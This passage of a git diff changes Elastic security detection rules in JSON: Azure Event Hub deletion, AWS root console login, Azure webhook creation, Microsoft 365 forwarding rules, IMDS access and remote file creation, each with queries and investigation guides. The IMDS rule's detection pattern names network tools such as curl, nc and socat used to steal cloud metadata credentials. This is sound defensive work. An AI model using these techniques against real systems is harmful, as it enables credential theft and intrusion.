promptly.\n- Review and update security policies and access controls for Azure resources to prevent recurrence, ensuring adherence to the principle of least privilege.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.EVENTHUB/NAMESPACES/EVENTHUBS/DELETE\" and event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about", - "https://azure.microsoft.com/en-in/services/event-hubs/", - "https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-features" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "e0f36de1-0342-453d-95a9-a068b257b053", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Log Auditing", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.001", - "name": "Disable or Modify Tools", - "reference": "https://attack.mitre.org/techniques/T1562/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "e0f36de1-0342-453d-95a9-a068b257b053_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_212.json b/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_212.json new file mode 100644 index 00000000000..a0cc4b41a50 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_212.json @@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a successful login to the AWS Management Console by the Root user.", + "false_positives": [ + "It's strongly recommended that the root user is not used for everyday tasks, including the administrative ones. Verify whether the IP address, location, and/or hostname should be logging in as root in your environment. Unfamiliar root logins should be investigated immediately. If known behavior is causing false positives, it can be exempted from the rule." + ], + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "event.action", + "event.outcome", + "aws.cloudtrail.console_login.additional_eventdata.mfa_used", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.response_elements" + ] + }, + "language": "kuery", + "license": "Elastic License v2", + "name": "AWS Management Console Root Login", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS Management Console Root Login\n\nThe AWS root user is the original identity with unrestricted privileges over every resource in the account. Because it bypasses IAM boundaries and carries irreversible privileges, any successful root console login should be treated as a critical security event. AWS explicitly recommends locking away the root credentials and only using them for a small number of account-level administrative tasks (for example, closing an account, modifying support plans, or restoring MFA). See [Tasks that require the root user](https://docs.aws.amazon.com/general/latest/gr/root-vs-iam.html#aws_tasks-that-require-root).\n\nThis rule detects a successful AWS Management Console login by the root user (`ConsoleLogin` events with `userIdentity.type: Root` and `event.outcome: Success`).\n\n#### Possible investigation steps\n\n- **Confirm legitimacy.** \n Contact the designated root credential custodian or account owner to verify whether this login was expected and approved. Root access should only occur under documented change-control conditions.\n- **Review contextual event details.** \n Examine the CloudTrail fields in the alert:\n - `source.ip` \u2013 does it match known corporate IPs or expected admin VPNs? \n - `user_agent.original` \u2013 browser or automation? \n - `geo fields` \u2013 consistent with normal operations? \n - `@timestamp` \u2013 within a planned maintenance window?\n- **Check for prior or subsequent root activity.** \n Query CloudTrail for the last 30\u201390 days for any other root logins or root-initiated API calls. Multiple or recent root logins can indicate credential misuse.\n- **Correlate follow-on actions.** \n Look for risky API calls immediately after the login, such as:\n - `CreateUser`, `CreateAccessKey`, `AttachRolePolicy`, `PutBucketPolicy`, `UpdateAssumeRolePolicy`, `DeleteTrail`, or `StopLogging`. \n These actions may indicate persistence or cover-up attempts.\n- **Cross-account verification.** \n If the root user is federated through AWS Organizations or linked accounts, confirm no simultaneous logins occurred elsewhere.\n\n### False positive analysis\n\n- **Planned administrative actions.** \n Some rare maintenance tasks require root credentials (for example, payment method updates). If the login aligns with documented change control and was performed using MFA by the approved owner, the alert can be closed as benign.\n- **Third-party managed account scenarios.** \n Managed service providers may log in as root during onboarding or support activities. Confirm via ticketing or contractual documentation.\n\n### Response and remediation\n\n> The AWS Incident Response Playbooks classify root logins as **Priority-1 events** due to full-environment control. Follow these steps whether or not you have a dedicated IR team.\n\n**1. Immediate verification and containment**\n- If the login was not authorized or cannot be confirmed quickly: \n - Reset the root password using the AWS Management Console. \n - Rotate or remove any root access keys (root keys should normally not exist). \n - Ensure MFA is enabled and enforced on the root account. \n - Notify your security operations or cloud governance team.\n\n**2. Evidence preservation**\n- Export the alert\u2019s CloudTrail record and all subsequent events for 1 hour after the login. \n Store them in a restricted, immutable S3 evidence bucket. \n- Retain related GuardDuty findings, AWS Config history, and CloudTrail logs for the same period.\n\n**3. Scope and investigation**\n- Review additional events under the same `source.ip` to detect resource creation, IAM changes, or billing actions. \n- Inspect newly created users, roles, or keys since the login time to identify potential persistence mechanisms. \n- Check for any disabled or deleted CloudTrail trails, Security Hub findings suppression, or logging configuration changes.\n\n**4. Recovery and hardening**\n- Confirm MFA is working and only the authorized owner can access the root credentials. \n- Store root credentials in an offline vault under dual-custody control. \n- Enable organization-wide CloudTrail, GuardDuty, and Security Hub across all regions. \n- Implement policy and automation to alert on any future `userIdentity.type: Root` logins in real time. \n- Conduct a short post-incident review to update root-access procedures and reinforce least-privilege IAM practices.\n\n### Additional information\n\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/tree/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks):** See \u201cAccount Compromise\u201d and \u201cCredential Compromise\u201d playbooks for containment and recovery procedures. \n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs):** Reference \u201cAccount Access Investigation\u201d for evidence handling and credential rotation steps. \n- **AWS Documentation:** [Tasks that require the root user](https://docs.aws.amazon.com/general/latest/gr/root-vs-iam.html#aws_tasks-that-require-root). \n- **Security Best Practices:** [AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/). \n\n", + "query": "event.dataset:aws.cloudtrail and \nevent.provider:signin.amazonaws.com and \nevent.action:ConsoleLogin and \naws.cloudtrail.user_identity.type:Root and \nevent.outcome:success\n", + "references": [ + "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.user_identity.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e2a67480-3b79-403d-96e3-fdd2992c50ef", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Sign-In", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Initial Access", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 212 + }, + "id": "e2a67480-3b79-403d-96e3-fdd2992c50ef_212", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e3bd85e9-7aff-46eb-b60e-20dfc9020d98_3.json b/packages/security_detection_engine/kibana/security_rule/e3bd85e9-7aff-46eb-b60e-20dfc9020d98_3.json index e66ebfd9439..fed755cdf8a 100644 --- a/packages/security_detection_engine/kibana/security_rule/e3bd85e9-7aff-46eb-b60e-20dfc9020d98_3.json +++ b/packages/security_detection_engine/kibana/security_rule/e3bd85e9-7aff-46eb-b60e-20dfc9020d98_3.json @@ -19,6 +19,12 @@ "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-azure-monitor-sign-ins-log-schema", "https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/" ], + "related_integrations": [ + { + "package": "azure", + "version": "^1.0.0" + } + ], "risk_score": 73, "rule_id": "e3bd85e9-7aff-46eb-b60e-20dfc9020d98", "setup": "#### Required Azure Entra Sign-In Logs\nThis rule requires the Azure logs integration be enabled and configured to collect all logs, including sign-in logs from Entra. In Entra, sign-in logs must be enabled and streaming to the Event Hub used for the Azure logs integration.\n", diff --git a/packages/security_detection_engine/kibana/security_rule/e9ff9c1c-fe36-4d0d-b3fd-9e0bf4853a62_103.json b/packages/security_detection_engine/kibana/security_rule/e9ff9c1c-fe36-4d0d-b3fd-9e0bf4853a62_103.json deleted file mode 100644 index 15e269c9592..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/e9ff9c1c-fe36-4d0d-b3fd-9e0bf4853a62_103.json +++ /dev/null @@ -1,64 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when an Azure Automation webhook is created. Azure Automation runbooks can be configured to execute via a webhook. A webhook uses a custom URL passed to Azure Automation along with a data payload specific to the runbook. An adversary may create a webhook in order to trigger a runbook that contains malicious code.", - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Automation Webhook Created", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Automation Webhook Created\n\nAzure Automation webhooks enable automated task execution via HTTP requests, integrating with external systems. Adversaries may exploit this by creating webhooks to trigger runbooks with harmful scripts, maintaining persistence. The detection rule identifies webhook creation events, focusing on specific operation names and successful outcomes, to flag potential misuse in cloud environments.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to identify the user or service principal that initiated the webhook creation by examining the `event.dataset` and `azure.activitylogs.operation_name` fields.\n- Check the associated runbook linked to the created webhook to determine its purpose and inspect its content for any potentially malicious scripts or commands.\n- Investigate the source IP address and location from which the webhook creation request originated to identify any unusual or unauthorized access patterns.\n- Verify the legitimacy of the webhook by contacting the owner of the Azure Automation account or the relevant team to confirm if the webhook creation was expected and authorized.\n- Assess the broader context of the activity by reviewing recent changes or activities in the Azure Automation account to identify any other suspicious actions or configurations.\n\n### False positive analysis\n\n- Routine webhook creations for legitimate automation tasks can trigger false positives. Review the context of the webhook creation, such as the associated runbook and its purpose, to determine if it aligns with expected operations.\n- Frequent webhook creations by trusted users or service accounts may not indicate malicious activity. Consider creating exceptions for these users or accounts to reduce noise in alerts.\n- Automated deployment processes that involve creating webhooks as part of their workflow can be mistaken for suspicious activity. Document these processes and exclude them from triggering alerts if they are verified as safe.\n- Integration with third-party services that require webhook creation might generate alerts. Verify these integrations and whitelist them if they are part of approved business operations.\n- Regularly review and update the list of exceptions to ensure that only verified non-threatening behaviors are excluded, maintaining the effectiveness of the detection rule.\n\n### Response and remediation\n\n- Immediately disable the suspicious webhook to prevent further execution of potentially harmful runbooks.\n- Review the runbook associated with the webhook for any unauthorized or malicious scripts and remove or quarantine any identified threats.\n- Conduct a thorough audit of recent changes in the Azure Automation account to identify any unauthorized access or modifications.\n- Revoke any compromised credentials and enforce multi-factor authentication (MFA) for all accounts with access to Azure Automation.\n- Notify the security team and relevant stakeholders about the incident for further investigation and to ensure awareness of potential threats.\n- Implement enhanced monitoring and alerting for webhook creation and execution activities to detect similar threats in the future.\n- Document the incident, including actions taken and lessons learned, to improve response strategies and prevent recurrence.", - "query": "event.dataset:azure.activitylogs and\n azure.activitylogs.operation_name:\n (\n \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/WEBHOOKS/ACTION\" or\n \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/WEBHOOKS/WRITE\"\n ) and\n event.outcome:(Success or success)\n", - "references": [ - "https://powerzure.readthedocs.io/en/latest/Functions/operational.html#create-backdoor", - "https://github.com/hausec/PowerZure", - "https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a", - "https://www.ciraltos.com/webhooks-and-azure-automation-runbooks/" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "e9ff9c1c-fe36-4d0d-b3fd-9e0bf4853a62", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Configuration Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "e9ff9c1c-fe36-4d0d-b3fd-9e0bf4853a62_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_207.json b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_207.json deleted file mode 100644 index c90bb49b01b..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_207.json +++ /dev/null @@ -1,117 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic", - "Gary Blackwell", - "Austin Songer" - ], - "description": "Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges.", - "false_positives": [ - "Users and Administrators can create inbox rules for legitimate purposes. Verify if it complies with the company policy and done with the user's consent. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Inbox Forwarding Rule Created", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Inbox Forwarding Rule Created\n\nMicrosoft 365 allows users to create inbox rules to automate email management, such as forwarding messages to another address. While useful, attackers can exploit these rules to secretly redirect emails, facilitating data exfiltration. The detection rule monitors for the creation of such forwarding rules, focusing on successful events that specify forwarding parameters, thus identifying potential unauthorized email redirection activities.\n\n### Possible investigation steps\n\n- Review the event details to identify the user account associated with the creation of the forwarding rule by examining the o365.audit.Parameters.\n- Check the destination email address specified in the forwarding rule (ForwardTo, ForwardAsAttachmentTo, or RedirectTo) to determine if it is an external or suspicious address.\n- Investigate the user's recent activity logs in Microsoft 365 to identify any unusual or unauthorized actions, focusing on event.dataset:o365.audit and event.provider:Exchange.\n- Verify if the user has a legitimate reason to create such a forwarding rule by consulting with their manager or reviewing their role and responsibilities.\n- Assess if there have been any recent security incidents or alerts related to the user or the destination email address to identify potential compromise.\n- Consider disabling the forwarding rule temporarily and notifying the user and IT security team if the rule appears suspicious or unauthorized.\n\n### False positive analysis\n\n- Legitimate forwarding rules set by users for convenience or workflow purposes may trigger alerts. Review the context of the rule creation, such as the user and the destination address, to determine if it aligns with normal business operations.\n- Automated systems or third-party applications that integrate with Microsoft 365 might create forwarding rules as part of their functionality. Identify these systems and consider excluding their associated accounts from the rule.\n- Temporary forwarding rules set during user absence, such as vacations or leaves, can be mistaken for malicious activity. Implement a process to document and approve such rules, allowing for their exclusion from monitoring during the specified period.\n- Internal forwarding to trusted domains or addresses within the organization might not pose a security risk. Establish a list of trusted internal addresses and configure exceptions for these in the detection rule.\n- Frequent rule changes by specific users, such as IT administrators or support staff, may be part of their job responsibilities. Monitor these accounts separately and adjust the rule to reduce noise from expected behavior.\n\n### Response and remediation\n\n- Immediately disable the forwarding rule by accessing the affected user's mailbox settings in Microsoft 365 and removing any unauthorized forwarding rules.\n- Conduct a thorough review of the affected user's email account for any signs of compromise, such as unusual login activity or unauthorized changes to account settings.\n- Reset the password for the affected user's account and enforce multi-factor authentication (MFA) to prevent further unauthorized access.\n- Notify the user and relevant IT security personnel about the incident, providing details of the unauthorized rule and any potential data exposure.\n- Escalate the incident to the security operations team for further investigation and to determine if other accounts may have been targeted or compromised.\n- Implement additional monitoring on the affected account and similar high-risk accounts to detect any further suspicious activity or rule changes.\n- Review and update email security policies and configurations to prevent similar incidents, ensuring that forwarding rules are monitored and restricted as necessary.", - "query": "event.dataset:o365.audit and event.provider:Exchange and\nevent.category:web and event.action:(\"New-InboxRule\" or \"Set-InboxRule\") and\n (\n o365.audit.Parameters.ForwardTo:* or\n o365.audit.Parameters.ForwardAsAttachmentTo:* or\n o365.audit.Parameters.RedirectTo:*\n )\n and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/responding-to-a-compromised-email-account?view=o365-worldwide", - "https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps", - "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-outlook-rules-forms-attack?view=o365-worldwide", - "https://raw.githubusercontent.com/PwC-IR/Business-Email-Compromise-Guide/main/Extractor%20Cheat%20Sheet.pdf" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - }, - { - "ecs": false, - "name": "o365.audit.Parameters.ForwardAsAttachmentTo", - "type": "keyword" - }, - { - "ecs": false, - "name": "o365.audit.Parameters.ForwardTo", - "type": "keyword" - }, - { - "ecs": false, - "name": "o365.audit.Parameters.RedirectTo", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "ec8efb0c-604d-42fa-ac46-ed1cfbc38f78", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Collection", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0009", - "name": "Collection", - "reference": "https://attack.mitre.org/tactics/TA0009/" - }, - "technique": [ - { - "id": "T1114", - "name": "Email Collection", - "reference": "https://attack.mitre.org/techniques/T1114/", - "subtechnique": [ - { - "id": "T1114.003", - "name": "Email Forwarding Rule", - "reference": "https://attack.mitre.org/techniques/T1114/003/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ecc0cd54-608e-11ef-ab6d-f661ea17fbce_4.json b/packages/security_detection_engine/kibana/security_rule/ecc0cd54-608e-11ef-ab6d-f661ea17fbce_4.json deleted file mode 100644 index 95f6da9660c..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/ecc0cd54-608e-11ef-ab6d-f661ea17fbce_4.json +++ /dev/null @@ -1,139 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule identifies potentially malicious processes attempting to access the cloud service provider's instance metadata service (IMDS) API endpoint, which can be used to retrieve sensitive instance-specific information such as instance ID, public IP address, and even temporary security credentials if role's are assumed by that instance. The rule monitors for various tools and scripts like curl, wget, python, and perl that might be used to interact with the metadata API.", - "from": "now-9m", - "index": [ - "logs-endpoint.events.network*", - "logs-endpoint.events.process*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Unusual Instance Metadata Service (IMDS) API Request", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Unusual Instance Metadata Service (IMDS) API Request\n\nThe Instance Metadata Service (IMDS) API provides essential instance-specific data, including configuration details and temporary credentials, to applications running on cloud instances. Adversaries exploit this by using scripts or tools to access sensitive data, potentially leading to unauthorized access. The detection rule identifies suspicious access attempts by monitoring specific processes and network activities, excluding known legitimate paths, to flag potential misuse.\n\n### Possible investigation steps\n\n- Review the process details such as process.name and process.command_line to identify the tool or script used to access the IMDS API and determine if it aligns with known malicious behavior.\n- Examine the process.executable and process.working_directory fields to verify if the execution path is unusual or suspicious, especially if it originates from directories like /tmp/* or /var/tmp/*.\n- Check the process.parent.entity_id and process.parent.executable to understand the parent process and its legitimacy, which might provide context on how the suspicious process was initiated.\n- Investigate the network event details, particularly the destination.ip field, to confirm if there was an attempted connection to the IMDS API endpoint at 169.254.169.254.\n- Correlate the host.id with other security events or logs to identify any additional suspicious activities or patterns on the same host that might indicate a broader compromise.\n- Assess the risk score and severity to prioritize the investigation and determine if immediate action is required to mitigate potential threats.\n\n### False positive analysis\n\n- Security and monitoring tools like Rapid7, Nessus, and Amazon SSM Agent may trigger false positives due to their legitimate access to the IMDS API. Users can exclude these by adding their working directories to the exception list.\n- Automated scripts or processes running from known directories such as /opt/rumble/bin or /usr/share/ec2-instance-connect may also cause false positives. Exclude these directories or specific executables from the rule to prevent unnecessary alerts.\n- System maintenance or configuration scripts that access the IMDS API for legitimate purposes might be flagged. Identify these scripts and add their paths or parent executables to the exclusion list to reduce noise.\n- Regular network monitoring tools that attempt connections to the IMDS IP address for health checks or status updates can be excluded by specifying their process names or executable paths in the exception criteria.\n\n### Response and remediation\n\n- Immediately isolate the affected instance from the network to prevent further unauthorized access or data exfiltration.\n- Terminate any suspicious processes identified in the alert that are attempting to access the IMDS API, especially those using tools like curl, wget, or python.\n- Revoke any temporary credentials that may have been exposed or accessed through the IMDS API to prevent unauthorized use.\n- Conduct a thorough review of the instance's security groups and IAM roles to ensure that only necessary permissions are granted and that there are no overly permissive policies.\n- Escalate the incident to the security operations team for further investigation and to determine if additional instances or resources are affected.\n- Implement network monitoring to detect and alert on any future attempts to access the IMDS API from unauthorized processes or locations.\n- Review and update the instance's security configurations and apply any necessary patches or updates to mitigate vulnerabilities that could be exploited in similar attacks.", - "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n[process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n process.parent.executable != null and \n (\n process.name : (\n \"curl\", \"wget\", \"python*\", \"perl*\", \"php*\", \"ruby*\", \"lua*\", \"telnet\", \"pwsh\",\n \"openssl\", \"nc\", \"ncat\", \"netcat\", \"awk\", \"gawk\", \"mawk\", \"nawk\", \"socat\", \"node\"\n ) or \n process.executable : (\n \"./*\", \"/tmp/*\", \"/var/tmp/*\", \"/var/www/*\", \"/dev/shm/*\", \"/etc/init.d/*\", \"/etc/rc*.d/*\",\n \"/etc/cron*\", \"/etc/update-motd.d/*\", \"/boot/*\", \"/srv/*\", \"/run/*\", \"/etc/rc.local\"\n ) or\n process.command_line: \"*169.254.169.254*\" \n ) \n and not process.working_directory: (\n \"/opt/rapid7*\",\n \"/opt/nessus*\",\n \"/snap/amazon-ssm-agent*\",\n \"/var/snap/amazon-ssm-agent/*\",\n \"/var/log/amazon/ssm/*\",\n \"/srv/snp/docker/overlay2*\",\n \"/opt/nessus_agent/var/nessus/*\") \n and not process.executable: (\n \"/opt/rumble/bin/rumble-agent*\",\n \"/opt/aws/inspector/bin/inspectorssmplugin\",\n \"/snap/oracle-cloud-agent/*\",\n \"/lusr/libexec/oracle-cloud-agent/*\") \n and not process.parent.executable: (\n \"/usr/bin/setup-policy-routes\",\n \"/usr/share/ec2-instance-connect/*\",\n \"/var/lib/amazon/ssm/*\", \n \"/etc/update-motd.d/30-banner\", \n \"/usr/sbin/dhclient-script\", \n \"/usr/local/bin/uwsgi\", \n \"/usr/lib/skylight/al-extras\")\n]\n[network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and destination.ip == \"169.254.169.254\"]\n", - "references": [ - "https://hackingthe.cloud/aws/general-knowledge/intro_metadata_service/" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "destination.ip", - "type": "ip" - }, - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.command_line", - "type": "wildcard" - }, - { - "ecs": true, - "name": "process.executable", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.parent.entity_id", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.parent.executable", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.working_directory", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "ecc0cd54-608e-11ef-ab6d-f661ea17fbce", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Discovery", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1552", - "name": "Unsecured Credentials", - "reference": "https://attack.mitre.org/techniques/T1552/", - "subtechnique": [ - { - "id": "T1552.005", - "name": "Cloud Instance Metadata API", - "reference": "https://attack.mitre.org/techniques/T1552/005/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1580", - "name": "Cloud Infrastructure Discovery", - "reference": "https://attack.mitre.org/techniques/T1580/" - } - ] - } - ], - "type": "eql", - "version": 4 - }, - "id": "ecc0cd54-608e-11ef-ab6d-f661ea17fbce_4", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ed3fedc3-dd10-45a5-a485-34a8b48cea46_1.json b/packages/security_detection_engine/kibana/security_rule/ed3fedc3-dd10-45a5-a485-34a8b48cea46_1.json deleted file mode 100644 index c0002fb9884..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/ed3fedc3-dd10-45a5-a485-34a8b48cea46_1.json +++ /dev/null @@ -1,100 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule leverages the new_terms rule type to detect file creation via a commonly used file transfer service while excluding typical remote file creation activity. This behavior is often linked to lateral movement, potentially indicating an attacker attempting to move within a network.", - "from": "now-9m", - "history_window_start": "now-10d", - "index": [ - "logs-endpoint.events.file*", - "auditbeat-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Unusual Remote File Creation", - "new_terms_fields": [ - "process.executable", - "host.id" - ], - "query": "event.category:file and host.os.type:linux and event.action:creation and\nprocess.name:(scp or ftp or sftp or vsftpd or sftp-server or sync) and\nnot file.path:(/dev/ptmx or /run/* or /var/run/*)\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - 